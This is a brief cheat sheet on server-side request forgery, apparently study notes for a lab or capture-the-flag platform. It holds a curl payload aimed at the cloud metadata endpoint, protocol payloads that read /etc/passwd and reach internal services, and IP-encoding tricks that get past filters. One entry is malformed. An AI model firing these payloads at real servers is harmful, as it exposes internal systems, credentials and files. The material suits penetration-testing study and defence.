# Server-Side Request Forgery (SSRF)

## SSRF Tests (curl)

```bash
curl "http://target.com/api/proxy?url=http://169.254.169.254/"
```

## Exploitation:

* **Internal port scanning**: Attempting to access internal services and ports on the server's localhost.
* **Accessing restricted endpoints**: Bypassing access controls to reach sensitive internal resources.

## Common Protocols for SSRF:

* `http://127.0.0.1/file:///etc/passwd` → Access local files.
* `gopher://dateserver.htb:80/...` → Use the gopher protocol to send arbitrary requests.
* `dict://127.0.0.1:11211/info` → Query dictionary services.
* `ftp://127.0.0.1:21` → Access FTP servers.
* `file://` → Access local files.
* `php://` → PHP stream wrappers (highly dangerous).
* `data://` → Data encoding.
* `https://` → Accessing internal HTTPS servers.

## Advanced SSRF Bypass Techniques:

* **URL Encoding**: `http://127.0.0.1%3A80`
* **Double Encoding**: `http://127.0.0.1%253A80`
* **Alternative IP Representations**:
  * **Octal**: `http://0177.0.0.1`
  * **Hexadecimal**: `http://0x7F.0x00.0x00.0x01`
  * **IPv6 Abuse**: `http://[::1]:80`
* **DNS Rebinding**: Change IP resolutions dynamically.
* **Varying Ports**: Bypass filters using different ports.